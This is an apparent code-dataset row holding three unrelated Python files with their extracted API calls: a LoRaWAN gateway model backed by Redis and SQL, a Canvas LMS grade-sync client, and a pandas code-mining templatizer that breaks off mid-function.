code (string, 22-1.05M chars) | apis (sequence, 1-3.31k items) | extract_api (string, 75-3.25M chars)
---|---|---
from database.db0 import db0, ConstDB
from database.db3 import db3, ConstDB3
from utils.errors import KeyDuplicateError, ReadOnlyDeny
from utils.utils import eui_64_to_48, eui_48_to_64
from binascii import hexlify
from enum import Enum
import enum
from userver.frequency_plan import FrequencyPlan
from userver.object.asserts import Assertions
from userver.user.models import User
from sqlalchemy import Column, String, BINARY
from sqlalchemy import orm, ForeignKey
from database.db_sql import db_sql
import eviltransform
class Platform(Enum):
rpi = 'Raspberry Pi'
rpi3 = 'Raspberry Pi 3'
linklabs = 'LinkLabs'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Platform), '%r is not a valid Platform' % value
class Model(Enum):
imst = 'IMST'
linklabs = 'LinkLabs'
menthink = 'MenThink'
risinghf = 'RisingHF'
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Model), '%r is not a valid Model' % value
class Field:
id = 'id'
mac_addr = 'mac_addr'
name = 'name'
platform = 'platform'
model = 'model'
freq_plan = 'freq_plan'
public = 'public'
disable = 'disable'
time = 'time'
lng = 'lng'
lat = 'lat'
alt = 'alt'
location = 'location'
user_id = 'user_id'
restart = 'restart'
class Location:
_assert_switcher = {Field.lng: Assertions.a_float,
Field.lat: Assertions.a_float,
Field.alt: Assertions.a_int, }
def __setattr__(self, key, value):
self._assert_switcher[key](value)
self.__dict__[key] = value
def __init__(self, lng, lat, alt):
self.lng = lng
self.lat = lat
self.alt = alt
self.switch_wgs2gcj()
def __str__(self):
return '%s,%s,%s' % (self.lng, self.lat, self.alt)
def obj_to_dict(self):
info = {}
for key, value in self.__dict__.items():
if key in (Field.lng, Field.lat, Field.alt):
info[key] = value
return info
def switch_wgs2gcj(self):
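# Note (added for context): eviltransform.wgs2gcj converts WGS-84 (GPS) coordinates to GCJ-02,
# the shifted datum used by Chinese map providers; it takes and returns a (lat, lng) pair and
# leaves coordinates outside China unchanged.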
self.lat, self.lng = eviltransform.wgs2gcj(self.lat, self.lng)
@staticmethod
def assert_isinstanceof(value):
assert isinstance(value, Location), '%r is not a valid Location' % value
class objects:
@staticmethod
def str_to_obj(string):
string = string.split(',')
try:
return Location(float(string[0]), float(string[1]), int(string[2]))
except Exception as error:
raise error
class Gateway(db_sql.Model):
redis_fields = (Field.user_id, Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.location)
__vars_can_write = (Field.platform, Field.model, Field.freq_plan, Field.public, Field.disable, Field.name, Field.location)
_assert_switcher = {
Field.user_id: Assertions.a_not_negative_int,
Field.id: Assertions.a_eui_64,
Field.mac_addr: Assertions.a_eui_48,
Field.name: Assertions.a_str,
Field.platform: Platform.assert_isinstanceof,
Field.freq_plan: FrequencyPlan.assert_isinstanceof,
Field.model: Model.assert_isinstanceof,
Field.public: Assertions.a_bool,
Field.disable: Assertions.a_bool,
Field.restart: Assertions.a_bool,
Field.location: Location.assert_isinstanceof,
Field.time: Assertions.a_int,
}
__table_args__ = {'schema': 'nwkserver'}
__tablename__ = 'gateway'
id = Column(BINARY(8), primary_key=True)
name = Column(String(50))
user_id = db_sql.Column(db_sql.Integer(), ForeignKey(User.id, ondelete='CASCADE', onupdate='CASCADE'), nullable=False)
@orm.reconstructor
def init_on_load(self):
self.mac_addr = eui_64_to_48(self.id)
info = db0.hgetall(ConstDB.gateway + hexlify(self.id).decode())
self.freq_plan = FrequencyPlan(info[b'freq_plan'].decode())
self.public = bool(int(info[b'public']))
self.disable = bool(int(info[b'disable']))
self.platform = Platform[info[b'platform'].decode()]
self.model = Model[info[b'model'].decode()]
location = info.get(b'location')
if location is not None:
self.location = Location.objects.str_to_obj(location.decode())
else:
self.location = Location(0.0, 0.0, 0)
time = db3.get(ConstDB3.T_GATEWAY + hexlify(self.id).decode())
if time is not None:
self.time = int(time)
def __setattr__(self, key, value):
try:
attr = getattr(self, key)
if attr is not None and key not in self.__vars_can_write:
raise ReadOnlyDeny
except AttributeError:
pass
if key in self._assert_switcher:
self._assert_switcher[key](value)
super().__setattr__(key, value)
def __init__(self, user_id, mac_addr, name, platform, model, freq_plan=FrequencyPlan.EU863_870, public=True, disable=False, location=None):
"""
:param id: 8 bytes
:param name: str
:param platform: Platform
:return:
"""
self.user_id = user_id
self.id = eui_48_to_64(mac_addr)
self.name = name
self.platform = platform
self.freq_plan = freq_plan
self.public = public
self.disable = disable
self.model = model
if location is not None:
self.location = location
else:
self.location = Location(0.0, 0.0, 0)
def _zip_vars(self):
return dict(zip(self.redis_fields,
(self.user_id, self.platform.name, self.model.name, self.freq_plan.value, self.public.real, self.disable.real, str(self.location))))
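# For illustration (hypothetical user_id; the FrequencyPlan value string is not shown in this module):
# a public, enabled Raspberry Pi gateway with an IMST concentrator produces a Redis hash roughly like
# {'user_id': 1, 'platform': 'rpi', 'model': 'imst', 'freq_plan': <FrequencyPlan value>, 'public': 1,
# 'disable': 0, 'location': '0.0,0.0,0'}, written by save() under the key ConstDB.gateway + <hex gateway id>.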
def _zip_vars_can_write(self):
dd = {}
for field in self.redis_fields:
if field in self.__vars_can_write:
value = getattr(self, field)
if isinstance(value, enum.Enum):
value = value.value if field == Field.freq_plan else value.name
elif isinstance(value, bool):
value = value.real
dd[field] = value
return dd
def send_restart_request(self):
db0.hset(ConstDB.gateway + hexlify(self.id).decode(), 'restart', 1)
def save(self):
db_sql.session.add(self)
id_str = hexlify(self.id).decode()
key = ConstDB.gateway + id_str
if db0.exists(key):
raise KeyDuplicateError(key)
db0.hmset(key, self._zip_vars())
#save to sql
db_sql.session.commit()
db_sql.session.registry.clear()
def update(self):
print(self._zip_vars_can_write())
db0.hmset(ConstDB.gateway + hexlify(self.id).decode(), self._zip_vars_can_write())
db_sql.session.commit()
def delete(self):
db_sql.session.delete(self)
db_sql.session.commit()
# delete from sql
id = hexlify(self.id).decode()
gateway_trans = db0.keys(pattern=ConstDB.trans_params + '*' + id)
pipe = db0.pipeline()
for key in gateway_trans:
key = key.decode()
pipe.delete(key)
dev_eui = key.split(":")[1]
pipe.zrem(ConstDB.dev_gateways + dev_eui, self.id)
pipe.delete(ConstDB.gateway + id)
pipe.delete(ConstDB.gateway_pull + id)
pipe.execute()
def obj_to_dict(self):
dd = {
'id': hexlify(self.id).decode().upper(),
'mac_addr': hexlify(self.mac_addr).decode().upper(),
'name': self.name,
'platform': self.platform.value,
'model': self.model.value,
'freq_plan': self.freq_plan.value,
'public': self.public,
'disable': self.disable,
'location': self.location.obj_to_dict(),
}
if hasattr(self, 'time'):
dd['last_data'] = self.time
self.get_pull_info()
if hasattr(self, 'ip_addr'):
dd['ip'] = self.ip_addr
if hasattr(self, 'prot_ver'):
dd['ver'] = self.prot_ver
return dd
def get_pull_info(self):
key = ConstDB.gateway_pull + hexlify(self.id).decode()
info = db0.hgetall(key)
if info:
self.ip_addr = info[b'ip_addr'].decode()
self.prot_ver = int(info[b'prot_ver'])
if __name__ == '__main__':
print(Model('IMST')) | [
"utils.utils.eui_64_to_48",
"database.db0.db0.hgetall",
"database.db_sql.db_sql.session.delete",
"database.db0.db0.exists",
"binascii.hexlify",
"utils.errors.KeyDuplicateError",
"database.db0.db0.keys",
"database.db0.db0.pipeline",
"sqlalchemy.ForeignKey",
"sqlalchemy.BINARY",
"eviltransform.wgs2gcj",
"database.db_sql.db_sql.session.registry.clear",
"database.db_sql.db_sql.Integer",
"sqlalchemy.String",
"database.db_sql.db_sql.session.add",
"utils.utils.eui_48_to_64",
"database.db_sql.db_sql.session.commit"
] | [((2130, 2171), 'eviltransform.wgs2gcj', 'eviltransform.wgs2gcj', (['self.lat', 'self.lng'], {}), '(self.lat, self.lng)\n', (2151, 2171), False, 'import eviltransform\n'), ((3764, 3773), 'sqlalchemy.BINARY', 'BINARY', (['(8)'], {}), '(8)\n', (3770, 3773), False, 'from sqlalchemy import Column, String, BINARY\n'), ((3811, 3821), 'sqlalchemy.String', 'String', (['(50)'], {}), '(50)\n', (3817, 3821), False, 'from sqlalchemy import Column, String, BINARY\n'), ((3851, 3867), 'database.db_sql.db_sql.Integer', 'db_sql.Integer', ([], {}), '()\n', (3865, 3867), False, 'from database.db_sql import db_sql\n'), ((3869, 3928), 'sqlalchemy.ForeignKey', 'ForeignKey', (['User.id'], {'ondelete': '"""CASCADE"""', 'onupdate': '"""CASCADE"""'}), "(User.id, ondelete='CASCADE', onupdate='CASCADE')\n", (3879, 3928), False, 'from sqlalchemy import orm, ForeignKey\n'), ((4022, 4043), 'utils.utils.eui_64_to_48', 'eui_64_to_48', (['self.id'], {}), '(self.id)\n', (4034, 4043), False, 'from utils.utils import eui_64_to_48, eui_48_to_64\n'), ((5440, 5462), 'utils.utils.eui_48_to_64', 'eui_48_to_64', (['mac_addr'], {}), '(mac_addr)\n', (5452, 5462), False, 'from utils.utils import eui_64_to_48, eui_48_to_64\n'), ((6599, 6623), 'database.db_sql.db_sql.session.add', 'db_sql.session.add', (['self'], {}), '(self)\n', (6617, 6623), False, 'from database.db_sql import db_sql\n'), ((6717, 6732), 'database.db0.db0.exists', 'db0.exists', (['key'], {}), '(key)\n', (6727, 6732), False, 'from database.db0 import db0, ConstDB\n'), ((6845, 6868), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (6866, 6868), False, 'from database.db_sql import db_sql\n'), ((6877, 6908), 'database.db_sql.db_sql.session.registry.clear', 'db_sql.session.registry.clear', ([], {}), '()\n', (6906, 6908), False, 'from database.db_sql import db_sql\n'), ((7073, 7096), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (7094, 7096), False, 'from database.db_sql import db_sql\n'), ((7128, 7155), 'database.db_sql.db_sql.session.delete', 'db_sql.session.delete', (['self'], {}), '(self)\n', (7149, 7155), False, 'from database.db_sql import db_sql\n'), ((7164, 7187), 'database.db_sql.db_sql.session.commit', 'db_sql.session.commit', ([], {}), '()\n', (7185, 7187), False, 'from database.db_sql import db_sql\n'), ((7277, 7326), 'database.db0.db0.keys', 'db0.keys', ([], {'pattern': "(ConstDB.trans_params + '*' + id)"}), "(pattern=ConstDB.trans_params + '*' + id)\n", (7285, 7326), False, 'from database.db0 import db0, ConstDB\n'), ((7342, 7356), 'database.db0.db0.pipeline', 'db0.pipeline', ([], {}), '()\n', (7354, 7356), False, 'from database.db0 import db0, ConstDB\n'), ((8520, 8536), 'database.db0.db0.hgetall', 'db0.hgetall', (['key'], {}), '(key)\n', (8531, 8536), False, 'from database.db0 import db0, ConstDB\n'), ((6752, 6774), 'utils.errors.KeyDuplicateError', 'KeyDuplicateError', (['key'], {}), '(key)\n', (6769, 6774), False, 'from utils.errors import KeyDuplicateError, ReadOnlyDeny\n'), ((6641, 6657), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (6648, 6657), False, 'from binascii import hexlify\n'), ((7227, 7243), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7234, 7243), False, 'from binascii import hexlify\n'), ((8479, 8495), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (8486, 8495), False, 'from binascii import hexlify\n'), ((4089, 4105), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (4096, 4105), False, 'from 
binascii import hexlify\n'), ((4654, 4670), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (4661, 4670), False, 'from binascii import hexlify\n'), ((6529, 6545), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (6536, 6545), False, 'from binascii import hexlify\n'), ((7010, 7026), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7017, 7026), False, 'from binascii import hexlify\n'), ((7729, 7745), 'binascii.hexlify', 'hexlify', (['self.id'], {}), '(self.id)\n', (7736, 7745), False, 'from binascii import hexlify\n'), ((7790, 7812), 'binascii.hexlify', 'hexlify', (['self.mac_addr'], {}), '(self.mac_addr)\n', (7797, 7812), False, 'from binascii import hexlify\n')] |
import logging
import pytz
from urllib.parse import urlencode, urljoin, urlparse, parse_qs
import requests
from django.conf import settings
from ol_openedx_canvas_integration.constants import DEFAULT_ASSIGNMENT_POINTS
log = logging.getLogger(__name__)
class CanvasClient:
def __init__(self, canvas_course_id):
self.session = self.get_canvas_session()
self.canvas_course_id = canvas_course_id
@staticmethod
def get_canvas_session():
"""
Create a request session with the access token
"""
session = requests.Session()
session.headers.update({
"Authorization": "Bearer {token}".format(token=settings.CANVAS_ACCESS_TOKEN)
})
return session
@staticmethod
def _add_per_page(url, per_page):
"""
Add per_page query parameter to override default value of 10
Args:
url (str): The url to update
per_page (int): The new per_page value
Returns:
str: The updated URL
"""
pieces = urlparse(url)
query = parse_qs(pieces.query)
query['per_page'] = per_page
query_string = urlencode(query, doseq=True)
pieces = pieces._replace(query=query_string)
return pieces.geturl()
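# Example for the method above (illustrative host name): given
#   "https://canvas.example.com/api/v1/courses/1/enrollments?page=2" and per_page=100,
# it returns "https://canvas.example.com/api/v1/courses/1/enrollments?page=2&per_page=100".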
def _paginate(self, url, *args, **kwargs):
"""
Iterate over the paginated results of a request
"""
url = self._add_per_page(url, 100) # increase per_page to 100 from default of 10
items = []
while url:
resp = self.session.get(url, *args, **kwargs)
resp.raise_for_status()
items.extend(resp.json())
links = requests.utils.parse_header_links(resp.headers["link"])
url = None
for link in links:
if link["rel"] == "next":
url = link["url"]
return items
def list_canvas_enrollments(self):
"""
Fetch canvas enrollments. This may take a while, so don't run in the request thread.
Returns:
dict: Email addresses mapped to canvas user ids for all enrolled users
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/enrollments".format(course_id=self.canvas_course_id)
)
enrollments = self._paginate(url)
return {
enrollment["user"]["login_id"].lower(): enrollment["user"]["id"]
for enrollment in enrollments
}
def list_canvas_assignments(self):
"""
List Canvas assignments
Returns:
list: A list of assignment dicts from Canvas
"""
url = urljoin(settings.CANVAS_BASE_URL, "/api/v1/courses/{course_id}/assignments".format(
course_id=self.canvas_course_id
))
return self._paginate(url)
def get_assignments_by_int_id(self):
assignments = self.list_canvas_assignments()
assignments_dict = {
assignment.get("integration_id"): assignment["id"]
for assignment in assignments
if assignment.get("integration_id") is not None
}
assignments_without_integration_id = sorted([
assignment["id"] for assignment in assignments if assignment.get("integration_id") is None
])
if assignments_without_integration_id:
log.warning(
"These assignments are missing an integration_id: %s",
", ".join(str(assignment_id) for assignment_id in assignments_without_integration_id)
)
return assignments_dict
def list_canvas_grades(self, assignment_id):
"""
List grades for a Canvas assignment
Args:
assignment_id (int): The canvas assignment id
"""
url = urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions".format(
course_id=self.canvas_course_id,
assignment_id=assignment_id,
)
)
return self._paginate(url)
def create_canvas_assignment(self, payload):
"""
Create an assignment on Canvas
Args:
payload (dict):
"""
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments".format(course_id=self.canvas_course_id)
),
json=payload,
)
def update_assignment_grades(self, canvas_assignment_id, payload):
return self.session.post(
url=urljoin(
settings.CANVAS_BASE_URL,
"/api/v1/courses/{course_id}/assignments/{assignment_id}/submissions/update_grades".format(
course_id=self.canvas_course_id,
assignment_id=canvas_assignment_id
)
),
data=payload,
)
def create_assignment_payload(subsection_block):
"""
Create a Canvas assignment dict matching a subsection block on edX
Args:
subsection_block (openedx.core.djangoapps.content.block_structure.block_structure.BlockData):
The block data for the graded assignment/exam (in the structure of a course, this unit is a subsection)
Returns:
dict:
Assignment payload to be sent to Canvas to create or update the assignment
"""
return {
"assignment": {
"name": subsection_block.display_name,
"integration_id": str(subsection_block.location),
"grading_type": "percent",
"points_possible": DEFAULT_ASSIGNMENT_POINTS,
"due_at": (
None if not subsection_block.fields.get("due")
# The internal API gives us a TZ-naive datetime for the due date, but Studio indicates that
# the user should enter a UTC datetime for the due date. Coerce this to UTC before creating the
# string representation.
else subsection_block.fields["due"].astimezone(pytz.UTC).isoformat()
),
"submission_types": ["none"],
"published": False,
}
}
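# For illustration (hypothetical subsection): a graded subsection named "Midterm Exam" with usage key
# "block-v1:Org+Course+Run+type@sequential+block@abc123" and a due date of 2021-05-01 23:59 UTC
# would yield roughly:
#   {"assignment": {"name": "Midterm Exam",
#                   "integration_id": "block-v1:Org+Course+Run+type@sequential+block@abc123",
#                   "grading_type": "percent", "points_possible": DEFAULT_ASSIGNMENT_POINTS,
#                   "due_at": "2021-05-01T23:59:00+00:00",
#                   "submission_types": ["none"], "published": False}}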
def update_grade_payload_kv(user_id, grade_percent):
"""
Returns a key/value pair that will be used in the body of a bulk grade update request
Args:
user_id (int): The Canvas user ID
grade_percent (numpy.float64): The percent score of the grade (between 0 and 1)
Returns:
(tuple): A key/value pair that will be used in the body of a bulk grade update request
"""
return (
"grade_data[{user_id}][posted_grade]".format(user_id=user_id),
"{pct}%".format(pct=grade_percent * 100)
)
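# Illustrative helper (not part of the original module): shows how the key/value pairs produced by
# update_grade_payload_kv() are collected into the form-encoded payload that
# CanvasClient.update_assignment_grades() posts to Canvas. The user ids and grades are hypothetical.
def _example_bulk_grade_update(client, canvas_assignment_id):
    grades = {101: 0.85, 102: 0.5}  # Canvas user id -> grade percent (between 0 and 1)
    payload = dict(update_grade_payload_kv(user_id, pct) for user_id, pct in grades.items())
    # payload == {"grade_data[101][posted_grade]": "85.0%", "grade_data[102][posted_grade]": "50.0%"}
    return client.update_assignment_grades(canvas_assignment_id, payload)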
| [
"urllib.parse.urlencode",
"requests.Session",
"requests.utils.parse_header_links",
"logging.getLogger",
"urllib.parse.parse_qs",
"urllib.parse.urlparse"
] | [((228, 255), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (245, 255), False, 'import logging\n'), ((564, 582), 'requests.Session', 'requests.Session', ([], {}), '()\n', (580, 582), False, 'import requests\n'), ((1064, 1077), 'urllib.parse.urlparse', 'urlparse', (['url'], {}), '(url)\n', (1072, 1077), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1094, 1116), 'urllib.parse.parse_qs', 'parse_qs', (['pieces.query'], {}), '(pieces.query)\n', (1102, 1116), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1177, 1205), 'urllib.parse.urlencode', 'urlencode', (['query'], {'doseq': '(True)'}), '(query, doseq=True)\n', (1186, 1205), False, 'from urllib.parse import urlencode, urljoin, urlparse, parse_qs\n'), ((1699, 1754), 'requests.utils.parse_header_links', 'requests.utils.parse_header_links', (["resp.headers['link']"], {}), "(resp.headers['link'])\n", (1732, 1754), False, 'import requests\n')] |
import builtins
import collections
import contextlib
import glob
import io
import os
import string
from typing import Dict, Any, Tuple, List, Collection, Optional
import attrs
import pandas as pd
from databutler.pat import astlib
from databutler.pat.analysis.type_analysis.mypy_types import SerializedMypyType
DF_TYPE = "pandas.core.frame.DataFrame"
SERIES_TYPE = "pandas.core.series.Series"
DF_GROUPBY_TYPE = "pandas.core.groupby.generic.DataFrameGroupBy"
SERIES_GROUPBY_TYPE = "pandas.core.groupby.generic.SeriesGroupBy"
BASE_GROUPBY_TYPE = "pandas.core.groupby.groupby.GroupBy"
GROUPBY_TYPES = {
BASE_GROUPBY_TYPE,
DF_GROUPBY_TYPE,
SERIES_GROUPBY_TYPE,
}
NewTarget = astlib.AstNode
DfArgs = List[str]
SeriesArgs = List[str]
NodeReplMap = Dict[astlib.AstNode, astlib.AstNode]
JsonDict = Dict
_BUILTIN_FUNCS = {k for k in builtins.__dict__ if not k.startswith("_")}
@attrs.define(eq=False, repr=False)
class MinedResult:
code: str
template: str
kind: str
nb_owner: str
nb_slug: str
uid: str
expr_type: Optional[SerializedMypyType]
type_map: Dict[str, SerializedMypyType]
df_vars: List[str]
series_vars: List[str]
template_vars: Dict[str, List[str]]
lib_usages: Dict[str, str] = attrs.field(factory=dict)
def to_json(self) -> JsonDict:
pass
@classmethod
def from_json(cls, json_dict: JsonDict) -> 'MinedResult':
pass
def prettify(self) -> str:
with contextlib.redirect_stdout(io.StringIO()) as f_out:
url = f"https://kaggle.com/{self.nb_owner}/{self.nb_slug}"
print(f"UID: {self.uid}\nKind: {self.kind}\nURL: {url}")
print("----------")
print(f"Code:\n{self.code}")
print("----------")
print(f"Templatized:\n{self.template}")
print("----------")
print(f"Value Type: {'Any' if self.expr_type is None else self.expr_type.type_json}")
print("==========")
return f_out.getvalue()
def __repr__(self):
return self.prettify()
def __str__(self):
return self.prettify()
def is_purely_df_or_series_like(expr_type: SerializedMypyType):
if not (expr_type.equals(DF_TYPE) or expr_type.equals(SERIES_TYPE)):
return False
if expr_type.is_union_type():
return all(is_purely_df_or_series_like(i) or i.is_any_type() for i in expr_type.unpack_union_type())
else:
return True
def find_library_usages(
code_ast: astlib.AstNode
) -> Dict[astlib.Name, str]:
"""Finds variable uses that correspond to imports / library usage"""
# TODO: Perform proper dataflow analysis (reaching defs)
result: Dict[astlib.Name, str] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
for def_ in defs:
if def_.enclosing_node is not None and isinstance(def_.enclosing_node, (astlib.Import, astlib.ImportFrom)):
key_dict = {}
if isinstance(def_.enclosing_node, astlib.Import):
prefix = ""
elif isinstance(def_.enclosing_node, astlib.ImportFrom) and def_.enclosing_node.module is not None:
prefix = astlib.to_code(def_.enclosing_node.module).strip() + "."
else:
continue
for alias in def_.enclosing_node.names:
name_str = astlib.to_code(alias.name).strip()
if alias.asname is None:
key_dict[name_str] = f"{prefix}{name_str}"
else:
key_dict[astlib.to_code(alias.asname.name).strip()] = f"{prefix}{name_str}"
for access in accesses:
if isinstance(access.node, astlib.Name):
if access.node.value in key_dict:
result[access.node] = key_dict[access.node.value]
return result
def find_constants(code_ast: astlib.AstNode) -> Dict[astlib.BaseExpression, Any]:
"""Finds constant expressions in the AST. Sound but not necessarily complete right now."""
# TODO: Perform proper dataflow analysis (constant propagation)
result: Dict[astlib.BaseExpression, Any] = {}
defs, accesses = astlib.get_definitions_and_accesses(code_ast)
# We will only focus on accesses whose defs are top-level statements to avoid
# having to bother about loops etc.
top_level_stmts = set(astlib.iter_body_stmts(code_ast))
accesses = [a for a in accesses if all(d.enclosing_node in top_level_stmts for d in a.definitions)]
numbering: Dict[astlib.AstNode, int] = {}
for idx, stmt in enumerate(astlib.iter_body_stmts(code_ast)):
for node in astlib.walk(stmt):
numbering[node] = idx
for access in accesses:
num = numbering[access.node]
# Find the closest top-level def
cur, score = None, None
for def_ in access.definitions:
d_num = numbering[def_.enclosing_node]
if d_num < num and (score is None or d_num > score):
cur, score = def_, d_num
if cur is None:
continue
if not isinstance(cur.enclosing_node, (astlib.AnnAssign, astlib.Assign)):
continue
if astlib.is_constant(cur.enclosing_node.value):
val = astlib.get_constant_value(cur.enclosing_node.value)
result[access.node] = val
return result
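# For illustration (hypothetical snippet): in
#   n = 3
#   out = df.head(n)
# the access to `n` inside df.head(n) is mapped to the constant 3, because its closest preceding
# top-level definition assigns a constant expression.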
def replace_constants(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
constants: Dict[astlib.BaseExpression, Any],
) -> Tuple[NewTarget, NodeReplMap]:
"""Replace any constant variables with their concrete values, and update the inferred types dict"""
repl_dict = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in free_vars:
continue
if node in constants:
repl_dict[node] = astlib.parse_expr(repr(constants[node]))
if len(repl_dict) == 0:
return target, {n: n for n in astlib.walk(target)}
output_mapping = {}
target = astlib.with_deep_replacements(target, repl_dict, output_mapping)
return target, output_mapping
def has_undefined_references(
target: astlib.AstNode,
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> bool:
"""Checks if there are any undefined variables that are not library usages and not dfs/series"""
for node in free_vars:
if node not in lib_usages:
if node not in inferred_types:
return True
typ = inferred_types[node]
is_builtin_func = typ.is_callable_type() and node.value in _BUILTIN_FUNCS
if not (typ.equals(DF_TYPE) or typ.equals(SERIES_TYPE) or typ.is_bool_type() or is_builtin_func):
return True
return False
def normalize_df_series_vars(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
) -> Tuple[NewTarget, DfArgs, SeriesArgs, NodeReplMap]:
"""Replaces variables corresponding to dataframes or series with standard names"""
seen_dfs: Dict[str, int] = {}
df_repl_map: Dict[astlib.Name, astlib.Name] = {}
seen_series: Dict[str, int] = {}
series_repl_map: Dict[astlib.Name, astlib.Name] = {}
for node in true_exprs:
if (not isinstance(node, astlib.Name)) or node not in inferred_types or node not in free_vars:
continue
# NOTE: If there is a union type of DataFrame and Series, DataFrame will be picked.
if inferred_types[node].equals(DF_TYPE):
if node.value not in seen_dfs:
seen_dfs[node.value] = len(seen_dfs) + 1
df_repl_map[node] = node # Will update later
elif inferred_types[node].equals(SERIES_TYPE):
if node.value not in seen_series:
seen_series[node.value] = len(seen_series) + 1
series_repl_map[node] = node # Will update later
if len({i.value for i in df_repl_map.keys()}) <= 1:
def df_arg_creator(ctr: int):
return "df"
else:
def df_arg_creator(ctr: int):
return f"df{ctr}"
if len({i.value for i in series_repl_map.keys()}) <= 1:
def series_arg_creator(ctr: int):
return "series"
else:
def series_arg_creator(ctr: int):
return f"series{ctr}"
for node in df_repl_map.keys():
df_repl_map[node] = astlib.create_name_expr(df_arg_creator(seen_dfs[node.value]))
for node in series_repl_map.keys():
series_repl_map[node] = astlib.create_name_expr(series_arg_creator(seen_series[node.value]))
output_map: NodeReplMap = {}
target = astlib.with_deep_replacements(target, {**df_repl_map, **series_repl_map}, output_map)
return (target,
sorted(i.value for i in df_repl_map.values()),
sorted(i.value for i in series_repl_map.values()),
output_map)
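# For illustration (hypothetical variable names): an expression such as train.merge(test), where both
# names are inferred as DataFrames, is rewritten to df1.merge(df2); with only one distinct DataFrame
# variable the standard name is simply `df`, and Series variables are renamed to `series`/`seriesN`
# in the same way.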
def normalize_call_args(
target: astlib.AstNode, inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalize order of keyword arguments"""
repl_map: NodeReplMap = {}
for node in astlib.walk(target):
if not isinstance(node, astlib.Call):
continue
call_expr = node
if (call_expr.func not in inferred_types) or (not inferred_types[call_expr.func].is_callable_type()):
continue
if any(arg.star != "" for arg in call_expr.args):
# TODO: How to handle starred args?
continue
pos_args = [arg for arg in call_expr.args if arg.keyword is None]
kw_args = [arg for arg in call_expr.args if arg.keyword is not None]
arg_order = inferred_types[call_expr.func].get_callable_arg_order()
new_args = [*pos_args] + sorted(kw_args, key=lambda x: arg_order.get(x.keyword.value, 0))
if len(new_args) > 0:
new_args[-1] = new_args[-1].with_changes(comma=astlib.cst.MaybeSentinel.DEFAULT)
if new_args != call_expr.args:
repl_map[call_expr] = call_expr.with_changes(args=new_args)
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def normalize_col_accesses(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType]
) -> Tuple[NewTarget, NodeReplMap]:
"""Normalizes col accesses by converting attribute-based accesses like df.Price to
subscript-based such as df['Price']"""
repl_map: NodeReplMap = {}
for expr in true_exprs:
if expr not in inferred_types:
continue
expr_typ = inferred_types[expr]
if isinstance(expr, astlib.Attribute):
value = expr.value
if value not in inferred_types:
continue
val_typ = inferred_types[value]
okay = False
# print("GOT HERE", val_typ, expr_typ)
if val_typ.equals(DF_TYPE) and (expr_typ.equals(DF_TYPE) or expr_typ.equals(SERIES_TYPE)):
try:
if (not hasattr(pd.DataFrame, expr.attr.value)) and (not hasattr(pd.Series, expr.attr.value)):
okay = True
except:
pass
elif (val_typ.equals(DF_GROUPBY_TYPE) and
(expr_typ.equals(DF_GROUPBY_TYPE) or expr_typ.equals(SERIES_GROUPBY_TYPE))):
try:
if not hasattr(pd.core.groupby.generic.DataFrameGroupBy, expr.attr.value):
okay = True
except:
pass
if okay:
new_node = astlib.parse_expr(f"dummy[\"{expr.attr.value}\"]").with_changes(value=expr.value)
repl_map[expr] = new_node
output_mapping: NodeReplMap = {}
if len(repl_map) != 0:
target = astlib.with_deep_replacements(target, repl_map, output_mapping)
return target, output_mapping
def templatize(
target: astlib.AstNode,
true_exprs: Collection[astlib.BaseExpression],
free_vars: Collection[astlib.Name],
inferred_types: Dict[astlib.BaseExpression, SerializedMypyType],
lib_usages: Dict[astlib.Name, str],
) -> Tuple[NewTarget, Dict[str, List[str]]]:
"""Replace constants and remaining variable names with standard ones to create a template suitable for clustering"""
type_to_exprs: Dict[str, List[astlib.BaseExpression]] = collections.defaultdict(list)
allowed_key_chars = set(string.ascii_letters + string.digits + "_")
for node in true_exprs:
is_const = astlib.is_constant(node)
const_val = None if not is_const else astlib.get_constant_value(node)
if not ((isinstance(node, astlib.Name) and node in free_vars) or
(is_const and not isinstance(const_val, (set, dict, list, tuple)))):
continue
if node in lib_usages:
continue
if node not in inferred_types:
if not is_const:
continue
key = type(const_val).__name__
else:
typ = inferred_types[node]
if typ.equals(DF_TYPE):
key = "df"
elif typ.equals(SERIES_TYPE):
key = "series"
elif typ.is_callable_type():
continue
elif typ.is_str_type():
key = "str"
elif typ.is_int_type():
key = "int"
elif typ.is_bool_type():
if isinstance(node, astlib.Name) and node.value in {"True", "False"}:
continue
key = "bool"
elif typ.is_float_type():
key = "float"
else:
while typ.is_union_type():
typ = typ.unpack_union_type()[0]
